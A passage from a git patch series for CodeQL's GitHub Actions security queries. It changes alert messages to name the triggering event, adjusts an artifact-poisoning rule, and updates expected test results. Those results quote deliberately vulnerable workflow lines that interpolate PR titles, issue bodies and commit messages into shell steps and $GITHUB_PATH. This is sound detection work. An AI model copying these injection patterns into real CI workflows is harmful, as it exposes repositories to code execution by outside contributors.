"body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | .github/workflows/test19.yml | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | .github/workflows/test.yml | +| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | .github/workflows/untrusted_checkout1.yml | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | .github/workflows/workflow_run_branches3.yml | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | .github/workflows/workflow_run_branches5.yml | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 4a561f26cb21..5d1ae7c3e74f 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -7,7 +7,7 @@ edges | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | provenance | | | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | provenance | | | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | provenance | | -| .github/actions/action5/action.yml:28:16:28:52 | github.event.pull_request.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | +| .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | @@ -215,18 +215,16 @@ edges | .github/workflows/untrusted_checkout1.yml:12:14:13:63 | echo "::set-output name=pr_number::$(> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | +| .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -612,8 +613,6 @@ subpaths | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result] | | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | .github/workflows/composite-action-caller-4.yml:10:9:17:6 | Uses Step: clone [result] | #select -| .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | -| .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action4/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | .github/workflows/changed-files.yml:15:9:18:6 | Uses Step: changed-files1 | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:20:24:20:76 | steps.changed-files1.outputs.all_changed_files | ${{ steps.changed-files1.outputs.all_changed_files }} | | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | .github/workflows/changed-files.yml:33:9:38:6 | Uses Step: changed-files3 | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:40:24:40:76 | steps.changed-files3.outputs.all_changed_files | ${{ steps.changed-files3.outputs.all_changed_files }} | | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | .github/workflows/changed-files.yml:53:9:56:6 | Uses Step: changed-files5 | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:58:24:58:76 | steps.changed-files5.outputs.all_changed_files | ${{ steps.changed-files5.outputs.all_changed_files }} | From aecb478e1c4d79206d19fcecfd8cde3a3e5f4146 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 11:58:45 +0100 Subject: [PATCH 640/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a8fab7861815..29687dd7a061 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.77 +version: 0.1.78 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f5924ff430c4..7b88d83d38e0 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.77 +version: 0.1.78 groups: [actions, queries] suites: codeql-suites extractor: javascript From 0ad7f08c9fc7e429585f287e9ca75e2689d6e173 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 16:15:47 +0100 Subject: [PATCH 641/707] fix: do not require github.event.workflow_run.id as an argument for gh run download --- ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll | 1 - 1 file changed, 1 deletion(-) diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 56f363164872..31427287b0c8 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -178,7 +178,6 @@ class GHRunArtifactDownloadStep extends UntrustedArtifactDownloadStep, Run { GHRunArtifactDownloadStep() { // eg: - run: gh run download ${{ github.event.workflow_run.id }} --repo "${GITHUB_REPOSITORY}" --name "artifact_name" this.getScript().getACommand().regexpMatch(".*gh\\s+run\\s+download.*") and - this.getScript().getACommand().matches("%github.event.workflow_run.id%") and ( this.getScript().getACommand().regexpMatch(unzipRegexp()) or this.getAFollowingStep().(Run).getScript().getACommand().regexpMatch(unzipRegexp()) From 31a9346d2d0a1a7dd79d3d3744be9680c845538e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 29 Oct 2024 11:59:59 +0100 Subject: [PATCH 642/707] feat: show trigger event on query results --- .../CWE-077/EnvPathInjectionCritical.ql | 4 +- .../CWE-077/EnvVarInjectionCritical.ql | 4 +- .../CWE-078/CommandInjectionCritical.ql | 4 +- .../CWE-088/ArgumentInjectionCritical.ql | 4 +- .../Security/CWE-094/CodeInjectionCritical.ql | 3 +- .../CWE-349/CachePoisoningViaCodeInjection.ql | 4 +- .../CachePoisoningViaPoisonableStep.ql | 3 +- .../UntrustedCheckoutTOCTOUCritical.ql | 3 +- .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 3 +- .../CWE-829/ArtifactPoisoningCritical.ql | 4 +- .../CWE-829/UntrustedCheckoutCritical.ql | 3 +- .../Security/CWE-829/UntrustedCheckoutHigh.ql | 3 +- .../CWE-077/EnvPathInjectionCritical.expected | 10 +- .../CWE-077/EnvVarInjectionCritical.expected | 72 ++--- .../CWE-078/CommandInjectionCritical.expected | 2 +- .../ArgumentInjectionCritical.expected | 24 +- .../CWE-094/CodeInjectionCritical.expected | 302 +++++++++--------- .../CachePoisoningViaCodeInjection.expected | 2 +- .../CachePoisoningViaPoisonableStep.expected | 14 +- .../UntrustedCheckoutTOCTOUCritical.expected | 20 +- .../UntrustedCheckoutTOCTOUHigh.expected | 4 +- .../ArtifactPoisoningCritical.expected | 34 +- .../UntrustedCheckoutCritical.expected | 80 ++--- .../CWE-829/UntrustedCheckoutHigh.expected | 44 +-- 24 files changed, 326 insertions(+), 324 deletions(-) diff --git a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql index 7d8a3b490091..3bb1558788a6 100644 --- a/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvPathInjectionCritical.ql @@ -35,5 +35,5 @@ where sink.getNode() instanceof EnvPathInjectionFromFileReadSink ) select sink.getNode(), source, sink, - "Potential PATH environment variable injection in $@, which may be controlled by an external user.", - sink, sink.getNode().toString() + "Potential PATH environment variable injection in $@, which may be controlled by an external user ($@).", + sink, sink.getNode().toString(), event, event.getName() diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index 540edfd8b5f9..13086c630808 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql @@ -44,5 +44,5 @@ where ) ) select sink.getNode(), source, sink, - "Potential environment variable injection in $@, which may be controlled by an external user.", - sink, sink.getNode().toString() + "Potential environment variable injection in $@, which may be controlled by an external user ($@).", + sink, sink.getNode().toString(), event, event.getName() diff --git a/ql/src/Security/CWE-078/CommandInjectionCritical.ql b/ql/src/Security/CWE-078/CommandInjectionCritical.ql index c3d6fa74f6c5..7d45b25b1a29 100644 --- a/ql/src/Security/CWE-078/CommandInjectionCritical.ql +++ b/ql/src/Security/CWE-078/CommandInjectionCritical.ql @@ -26,5 +26,5 @@ where check.protects(sink.getNode().asExpr(), event, ["command-injection", "code-injection"]) ) select sink.getNode(), source, sink, - "Potential command injection in $@, which may be controlled by an external user.", sink, - sink.getNode().asExpr().(Expression).getRawExpression() + "Potential command injection in $@, which may be controlled by an external user ($@).", sink, + sink.getNode().asExpr().(Expression).getRawExpression(), event, event.getName() diff --git a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql index 5962132d72e7..6930e2f684a4 100644 --- a/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql +++ b/ql/src/Security/CWE-088/ArgumentInjectionCritical.ql @@ -25,5 +25,5 @@ where check.protects(sink.getNode().asExpr(), event, "argument-injection") ) select sink.getNode(), source, sink, - "Potential argument injection in $@ command, which may be controlled by an external user.", sink, - sink.getNode().(ArgumentInjectionSink).getCommand() + "Potential argument injection in $@ command, which may be controlled by an external user ($@).", + sink, sink.getNode().(ArgumentInjectionSink).getCommand(), event, event.getName() diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index a197c5779483..b52c07023443 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -33,5 +33,4 @@ where ) select sink.getNode(), source, sink, "Potential code injection in $@, which may be controlled by an external user ($@).", sink, - sink.getNode().asExpr().(Expression).getRawExpression(), event, - event.getLocation().getFile().toString() + sink.getNode().asExpr().(Expression).getRawExpression(), event, event.getName() diff --git a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql index fe49b2dd3b51..23e1f223073f 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaCodeInjection.ql @@ -44,5 +44,5 @@ where ) ) select sink.getNode(), source, sink, - "Unprivileged code injection in $@, which may lead to cache poisoning.", sink, - sink.getNode().asExpr().(Expression).getRawExpression() + "Unprivileged code injection in $@, which may lead to cache poisoning ($@).", sink, + sink.getNode().asExpr().(Expression).getRawExpression(), event, event.getName() diff --git a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql index 74f49fccd30a..95adcfaf78ec 100644 --- a/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql +++ b/ql/src/Security/CWE-349/CachePoisoningViaPoisonableStep.ql @@ -58,4 +58,5 @@ where // excluding privileged workflows since they can be exploited in easier circumstances not job.isPrivileged() select step, source, step, - "Potential cache poisoning in the context of the default branch " + message + "Potential cache poisoning in the context of the default branch " + message + " ($@).", event, + event.getName() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql index 16fb2606af79..2aacf20b35fc 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.ql @@ -28,4 +28,5 @@ where exists(ControlCheck check1 | check1.protects(checkout, event, "untrusted-checkout")) and not exists(ControlCheck check2 | check2.protects(checkout, event, "untrusted-checkout-toctou")) select step, checkout, step, - "Insufficient protection against execution of untrusted code on a privileged workflow." + "Insufficient protection against execution of untrusted code on a privileged workflow ($@).", + event, event.getName() diff --git a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql index d4ed49e497aa..dde6ae69c488 100644 --- a/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql +++ b/ql/src/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.ql @@ -26,4 +26,5 @@ where exists(ControlCheck check1 | check1.protects(checkout, event, "untrusted-checkout")) and not exists(ControlCheck check2 | check2.protects(checkout, event, "untrusted-checkout-toctou")) select checkout, - "Insufficient protection against execution of untrusted code on a privileged workflow." + "Insufficient protection against execution of untrusted code on a privileged workflow ($@).", + event, event.getName() diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql index e4ab90e5fc2e..afef7bdd82b2 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningCritical.ql @@ -24,5 +24,5 @@ where check.protects(sink.getNode().asExpr(), event, "artifact-poisoning") ) select sink.getNode(), source, sink, - "Potential artifact poisoning in $@, which may be controlled by an external user.", sink, - sink.getNode().toString() + "Potential artifact poisoning in $@, which may be controlled by an external user ($@).", sink, + sink.getNode().toString(), event, event.getName() diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 07602af0ac4a..c1d3729701d1 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql @@ -52,5 +52,4 @@ where not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) and not exists(ControlCheck check | check.protects(poisonable, event, "untrusted-checkout")) select poisonable, checkout, poisonable, - "Execution of untrusted code on a privileged workflow ($@)", event, - event.getLocation().getFile().toString() + "Potential execution of untrusted code on a privileged workflow ($@)", event, event.getName() diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index 39cd18600975..98b9aee33f77 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql @@ -42,4 +42,5 @@ where not event.getName() = "issue_comment" and not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) ) -select checkout, "Potential execution of untrusted code on a privileged workflow." +select checkout, "Potential execution of untrusted code on a privileged workflow ($@)", event, + event.getName() diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected index 851aa5241546..f544994fc5c1 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected @@ -17,8 +17,8 @@ nodes | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | subpaths #select -| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | -| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | -| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | -| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable 